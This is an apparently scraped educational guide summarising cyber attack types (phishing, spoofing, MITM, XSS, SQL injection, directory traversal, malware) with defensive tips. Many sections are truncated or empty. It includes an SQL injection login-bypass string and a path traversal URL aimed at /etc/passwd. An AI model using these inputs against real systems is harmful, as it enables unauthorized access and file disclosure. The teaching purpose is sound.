Professional Documents
Culture Documents
Summary of Cyber Attack Types
Summary of Cyber Attack Types
© roadmap.sh
1
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Phishing..............................................................................................4
Vishing...............................................................................................4
Whaling..............................................................................................4
Smishing............................................................................................5
Spam.................................................................................................5
Spim..................................................................................................6
Shoulder Surfing..................................................................................7
Dumpster Diving..................................................................................8
Tailgating............................................................................................8
Zero Day...........................................................................................10
Social Engineering..............................................................................11
Reconnaissance..................................................................................12
Impersonation...................................................................................14
Watering Hole Attack..........................................................................15
Drive by Attack..................................................................................16
Typo Squatting...................................................................................17
Brute Force Attacks............................................................................19
Password Spray Attacks......................................................................19
DoS vs DDoS.....................................................................................20
MITM................................................................................................21
ARP Poisoning....................................................................................23
Evil Twin...........................................................................................24
DNS Poisoning...................................................................................25
Spoofing...........................................................................................27
Deauth Attack....................................................................................29
VLAN Hopping....................................................................................30
Rogue Access Point.............................................................................31
War-driving/dialing.............................................................................32
Buffer Overflow..................................................................................34
Memory Leak.....................................................................................35
2
Summary of Cyber Attack Types
Philipp Bùi Đỗ
XSS..................................................................................................37
SQL Injection.....................................................................................38
CSRF................................................................................................40
Replay Attack.....................................................................................41
Pass the Hash....................................................................................42
Directory Traversal.............................................................................44
Malware............................................................................................45
Phishing
3
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Vishing
Vishing, or voice phishing, involves attackers using phone calls or voice
messages to persuade victims into revealing sensitive information, such as
banking details or passwords. Vishing attacks often rely on social
engineering tactics, tricking the target into believing they’re speaking with a
legitimate company representative or authority figure.
Whaling
Whaling is a specific type of phishing attack that targets high-profile
individuals, such as executives, celebrities, or politicians. These attacks tend
to be more targeted and sophisticated, as the attacker has likely conducted
extensive research on the victim.
4
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Smishing
Smishing, or SMS phishing, is the act of using text messages to deceive
victims into revealing sensitive information or downloading malicious
software. The attacker may include a shortened URL or a phone number,
attempting to trick the victim into following the link or calling the number.
By staying informed about these various attack types, you can better protect
yourself and your organization from falling victim to cyber threats. Remain
vigilant and ensure you have proper security measures in place to minimize
the risk of these attacks.
Spam
Spam refers to any unwanted, unsolicited, or irrelevant messaging sent over
the internet, usually to a large number of users, for the purposes of
advertising, phishing, or spreading malware. These messages are typically
sent via email, which is why they are often called “spam emails.” Spam may
contain malicious attachments or links that, when clicked, download malware
or lead users to compromised websites.
Spim
Spim, or “spam over instant messaging,” is similar to spam but occurs over
instant messaging (IM) services, such as Facebook Messenger, WhatsApp,
and others. The main difference between spam and spim is the medium
through which the unwanted messages are sent. Just like spam, spim can be
used for advertising, spreading malware, or conducting phishing attacks.
Set your IM service’s privacy settings to limit who can message you
Be cautious when clicking on links or attachments from unknown or
suspicious accounts
Block or report spim accounts
Keep your IM client software updated
Shoulder Surfing
Shoulder surfing is a type of social engineering attack where an attacker
observes someone’s screen, keyboard, or any other device to gain
unauthorized access to sensitive information. It is typically performed by
6
Summary of Cyber Attack Types
Philipp Bùi Đỗ
secretly watching the victim during data entry, either directly or indirectly
through reflections, smartphones, or other recording equipment.
By staying cautious and adopting these security measures, you can greatly
reduce the risk of shoulder surfing and protect your sensitive data from
unauthorized access.
Dumpster Diving
Dumpster diving is a low-tech but potentially effective method used by
attackers to gather sensitive and valuable information by physically
searching through an organization’s trash. Dumpster divers often target
discarded documents such as old memos, printouts, and reports that may
7
Summary of Cyber Attack Types
Philipp Bùi Đỗ
How it works
Attackers search public and private trash receptacles to find information that
may be helpful in their attack strategy. By piecing together various details
from discarded documents, attackers may piece together a complete
understanding of the organization’s internal workings and gain access to
protected systems.
Countermeasures
Tailgating
Tailgating, also known as “piggybacking”, is a social engineering technique
used by attackers to gain unauthorized access to secure facilities or systems
by following closely behind a legitimate user. This attack exploits the human
tendency to trust others and help them out in various situations.
How it works
8
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Securing Access: Once inside, the attacker may even steal a physical
access card or exploit other vulnerabilities to secure long-term access.
Prevention Measures
Strict policies: Enforce strict policies regarding holding doors open for
others or allowing individuals into secure areas without proper
credentials.
Zero Day
A zero day attack is an exploit that takes advantage of an unknown
software vulnerability that has not been discovered, disclosed or patched by
the software’s developer. This type of attack, also known as an exploit, is
9
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Characteristics
There are certain characteristics that make zero day attacks particularly
dangerous, such as:
Speed: Zero day attacks are quickly executed, often before any
security measures can be implemented, resulting in a higher success
rate for attackers.
Consequences
Financial losses
Reputation damage
Mitigation Strategies
Social Engineering
Social engineering is a subtle yet highly effective method of manipulation
that plays on human emotions and behavior to gain unauthorized access to
sensitive information. It relies on psychological tactics, rather than technical
ones, to deceive people into providing confidential data, allowing
unauthorized access, or performing actions that compromise cybersecurity.
11
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Preventive Measures
Reconnaissance
Reconnaissance is a crucial stage in any cyber attack and refers to the
process of gathering information about potential targets, their systems,
networks, and vulnerabilities. This information is used by attackers to select
which tactics, techniques, or tools will be most effective when attempting to
compromise a target system or organization. Reconnaissance can be divided
into two primary methods: active and passive.
Active Reconnaissance
12
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Nmap: A network scanner that can discover hosts, services, and open
ports.
Passive Reconnaissance
Impersonation
Impersonation is a type of cyber attack where an attacker pretends to be a
legitimate user, system, or device to gain unauthorized access or manipulate
their target. This kind of attack can happen through various channels like
email, phone calls, social media, or instant messaging platforms.
Impersonation attacks mainly aim to deceive the target into providing
sensitive information, executing malicious actions, or gaining unauthorized
access to secure systems.
13
Summary of Cyber Attack Types
Philipp Bùi Đỗ
14
Summary of Cyber Attack Types
Philipp Bùi Đỗ
In this type of attack, the attacker does not directly target the victims;
instead, they focus on the websites that the targeted users commonly visit.
Here’s a step-by-step breakdown of a typical watering hole attack:
Drive by Attack
A Drive-by Attack is a common cyber security threat where an attacker
aims to infect a user’s computer or device by exploiting vulnerabilities in
their web browser or its plugins. Typically, users unknowingly fall victim to
drive-by attacks when they visit a malicious or compromised website, which
in turn automatically executes the malicious code.
16
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Typo Squatting
Typo Squatting, also known as URL hijacking or domain squatting, is a
malicious cyber-attack technique that targets internet users who mistakenly
enter an incorrect website address into their web browsers. When this
occurs, the users are directed to a fake website that closely resembles a
legitimate one. The attackers create these fake websites by registering
domain names similar to the target website, but with common typographical
errors. The goal of typo squatting is often to spread malware, steal personal
information or financial details, sell counterfeit products, or promote
phishing scams.
17
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Double-check URLs: Always double-check the URL you type into your
browser to ensure you are accessing the intended website.
Search Engines: If unsure about the correct URL, use search engines
to locate the desired website.
18
Summary of Cyber Attack Types
Philipp Bùi Đỗ
becoming a victim. Always verify that you’re visiting the correct website
before entering any personal or sensitive information.
To mitigate the risks of a Brute Force attack, implement the following best
practices:
19
Summary of Cyber Attack Types
Philipp Bùi Đỗ
DoS vs DDoS
In this section, we will discuss the differences between DoS (Denial of
Service) and DDoS (Distributed Denial of Service) attacks, two common
network-based attacks that can severely impact the availability and
performance of targeted systems.
20
Summary of Cyber Attack Types
Philipp Bùi Đỗ
A DDoS attack is similar to a DoS attack in its intent, but it utilizes multiple
computers or devices (usually compromised by malware) to launch the
attack. These devices, collectively called a “botnet”, send an overwhelming
amount of requests to the target system, making it even harder to mitigate
the attack and protect the resources.
Key Differences
In conclusion, both DoS and DDoS attacks aim to disrupt the availability of a
target system by overwhelming its resources. However, their key differences
lie in the scale and complexity of the attack, with DDoS attacks being more
powerful and more challenging to defend against. It is crucial for
organizations to implement robust security measures to detect and mitigate
these attacks to maintain the availability and integrity of their systems.
MITM
A Man-In-The-Middle (MITM) attack occurs when a malicious actor intercepts
the communication between two parties without their consent, with the
objective of eavesdropping or manipulating the exchanged data. By this
method, attackers may steal sensitive information, tamper with the
transmitted data, or impersonate the involved parties to gain unauthorized
control or access.
21
Summary of Cyber Attack Types
Philipp Bùi Đỗ
DNS Spoofing: The attacker modifies the DNS records to redirect the
victim to a malicious website instead of the intended one.
ARP Spoofing: The attacker alters the target’s ARP cache to associate
their MAC (Media Access Control) address with the victim’s IP address,
redirecting network traffic through the attacker’s device.
Use HTTPS and encryption: Make sure to encrypt all sensitive data
using secure communication protocols like HTTPS, SSL, or TLS.
22
Summary of Cyber Attack Types
Philipp Bùi Đỗ
ARP Poisoning
ARP Poisoning, also known as ARP spoofing or ARP cache poisoning, is a
cyber attack technique that exploits the Address Resolution Protocol (ARP) in
a computer network. ARP is responsible for mapping an IP address to a
corresponding Media Access Control (MAC) address, so that data packets can
be correctly transmitted to the intended network device. An attacker can use
ARP poisoning to intercept, modify, or disrupt communications between
network devices.
How It Works:
Other devices on the network treat the attacker’s MAC address as the
legitimate one for the targeted IP address, updating their ARP tables
accordingly.
As a result, data packets that were meant for the targeted device are
now sent to the attacker instead, potentially enabling them to
eavesdrop, modify, or disrupt network traffic.
Consequences:
23
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Evil Twin
An Evil Twin Attack is a malicious tactic used by cybercriminals to deceive
users by creating a fake wireless Access Point (AP) that mimics the
characteristics of a legitimate one. This rogue access point usually has the
same network name (SSID) and security settings as a genuine AP, making it
difficult for users to differentiate between the two.
How it works
The attacker sets up their own hardware in the vicinity of the targeted
wireless network and configures a rogue AP with the same SSID and
security settings as the genuine network.
Unsuspecting users connect to the rogue AP, thinking it’s the legitimate
network.
The attacker can now intercept and, in some cases, alter the user’s
data transmitted over the network. This can include sensitive
information such as login credentials, credit card details, and personal
conversations.
24
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Verify the SSID: Make sure you are connecting to the correct SSID.
Be cautious of networks with similar names or those that don’t require
a password.
DNS Poisoning
DNS Poisoning, also known as DNS Cache Poisoning or DNS Spoofing,
is a type of cyberattack where cyber-criminals manipulate the Domain Name
System (DNS) responses to redirect users to malicious websites. Let’s dive
deeper to understand how it works and its potential impact.
25
Summary of Cyber Attack Types
Philipp Bùi Đỗ
The attacker intercepts the DNS request and injects false DNS
information into the DNS resolver’s cache.
The DNS resolver then returns the falsified IP address to the user.
Here are some steps you can take to prevent and mitigate the risk of DNS
poisoning:
26
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Use Secure DNS Resolvers: Choose a secure DNS resolver that has
built-in mechanisms to prevent DNS poisoning, such as validating
DNSSEC signatures.
Monitor Your DNS Traffic: Regularly monitoring DNS query logs can
help you identify suspicious patterns or unusual activities, which may
indicate DNS poisoning attempts.
Spoofing
Spoofing is a type of cyber attack where an attacker impersonates or
masquerades as another entity (person or system) to gain unauthorized
access to sensitive information, manipulate communications or bypass
network security measures. Spoofing can come in various forms, including:
IP Spoofing
27
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Email Spoofing
Caller ID Spoofing
28
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Deauth Attack
A Deauthentication (Deauth) Attack is a type of Denial-of-Service (DoS)
attack that specifically targets wireless networks. It works by exploiting how
Wi-Fi devices communicate with one another, intentionally causing legitimate
users to be disconnected from the access point. The attacker sends a flood
of deauthentication (Deauth) frames to the targeted access point, effectively
overwhelming it and forcing connected clients to disconnect.
As an author of this guide, I advise you to stay diligent and follow the best
practices in order to safeguard your network from deauth attacks and other
security threats.
VLAN Hopping
VLAN hopping is a common network-based attack that exploits the
vulnerabilities of the VLAN trunking protocols in a local area network (LAN).
The objective of this attack is to gain unauthorized access to other VLANs or
to bypass the network’s security protocols by hopping between VLANs.
31
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Here are some measures to help detect and prevent rogue access points:
War-driving/dialing
War Driving
Mapping: After detecting the wireless signals, the attacker maps them
using GPS or other location-based services.
War Dialing
War dialing is a similar attack method but involves calling numerous phone
lines in search of modems and fax machines. War dialing allows the attacker
to identify insecure phone lines and unauthorized access points.
Analysis: The attacker will analyze the phone lines to assess their
security and vulnerabilities.
Prevention Strategies
To protect your network against war driving or war dialing, it’s important to:
Buffer Overflow
A buffer overflow is a common type of cybersecurity vulnerability that occurs
when a program writes or reads more data than the fixed-size buffer can
hold, resulting in the data to overwrite other data in memory. The overflow
can cause data corruption and lead to unexpected behavior, such as
application crashes or even the execution of malicious code.
Exploitation
Prevention Techniques
34
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Use safe APIs and libraries that check the size of the data before
copying it into the buffer.
Memory Leak
A memory leak occurs when a program or application allocates memory but
fails to release it back to the system when it is no longer needed. This can
lead to an accumulation of memory resources that are not in use, ultimately
causing a system’s performance to degrade or even crash as the available
memory resources become exhausted.
XSS
Cross-site scripting (XSS) is a type of cybersecurity vulnerability commonly
found in web applications. It occurs when an attacker injects malicious
scripts into webpages viewed by other users. These scripts can be used to
steal sensitive information, such as user credentials or sensitive data. XSS
vulnerabilities can lead to various consequences, like account takeover,
phishing attacks, and other malicious activities.
37
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Secure HTTP Headers: Set secure values for HTTP headers, such as
X-XSS-Protection, X-Content-Type-Options, X-Frame-Options, and X-
Content-Security-Policy, to prevent common XSS attack vectors.
SQL Injection
SQL Injection is a type of cyber attack that targets web applications and
databases. This technique takes advantage of vulnerabilities in the
application’s code by injecting malicious SQL statements and exploiting them
to gain unauthorized access or to manipulate the data in a database.
Attackers can potentially use this technique to retrieve, modify, delete, or
even add data to the database without proper authorization.
In this case, $username and $password are replaced with the values
provided by the user. If an attacker enters the following input for the
username field, they can manipulate the query to bypass the password
check:
' OR 1=1 --
SELECT * FROM users WHERE username = '' OR 1=1 -- ' AND password =
'$password'
As 1=1 is always true, the query returns a result, and the attacker gains
unauthorized access.
To protect your web applications from SQL Injection attacks, you should:
Validate User Input: Always validate and sanitize user input before
incorporating it into a SQL query. Use strict data types and validate
input against predefined patterns or value ranges.
39
Summary of Cyber Attack Types
Philipp Bùi Đỗ
CSRF
Cross-Site Request Forgery, or CSRF, is a type of attack that exploits the
trust that a user’s browser has in a web application. It tricks the user’s
browser into executing unwanted actions on a web application in which the
user is currently authenticated.
The user, while still authenticated to the web application, visits the
attacker’s website, which triggers the malicious code.
Data modifications
Privilege escalation
Account takeovers
Prevention Measures
40
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Replay Attack
A Replay Attack is a malicious action where an attacker intercepts data
transmitted between two parties, records the data, and retransmits it at a
later time to create unauthorized access or gain some benefit. This type of
attack happens when the data sent by the original sender is not altered in
any way but simply replayed, making the system think that it is receiving a
legitimate request.
41
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Prevention Techniques
Mitigation Strategies
43
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Directory Traversal
Directory traversal, also known as path traversal, is a type of cyber attack
that allows an attacker to access restricted files and directories on a server,
usually with the goal of obtaining sensitive information. This vulnerability
occurs when user input is not adequately validated and the attacker can
manipulate it to traverse the server directory structure.
How it Works
For example, consider a web application that allows users to view the
contents of a specific file by specifying its path through a URL parameter,
such as:
https://www.example.com/file.php?path=/user/documents/report.pdf
https://www.example.com/file.php?path=../../../../etc/passwd
44
Summary of Cyber Attack Types
Philipp Bùi Đỗ
If the server doesn’t properly validate and sanitize the input, it might reveal
the contents of the /etc/passwd file, which contains sensitive information
about system users.
Mitigation Techniques
Malware
Malware, short for malicious software, refers to any software intentionally
created to cause harm to a computer system, server, network, or user. It is a
broad term that encompasses various types of harmful software created by
cybercriminals for various purposes. In this guide, we will delve deeper into
the major types of malware and their characteristics.
Virus
45
Summary of Cyber Attack Types
Philipp Bùi Đỗ
host is executed. Viruses can corrupt, delete or modify data, and slow down
system performance.
Worm
Trojan Horse
Ransomware
Spyware
Adware
Rootkit
Keylogger
46
Summary of Cyber Attack Types
Philipp Bùi Đỗ
Keyloggers are a type of malware that monitor and record users’ keystrokes,
allowing attackers to capture sensitive information, such as login credentials
or financial information entered on a keyboard.
Understanding the different types of malware can help you better identify
and protect against various cyber threats. As the cyber landscape continues
to evolve, it’s essential to stay informed about emerging malware and equip
yourself with the necessary security skills and knowledge.
47
Summary of Cyber Attack Types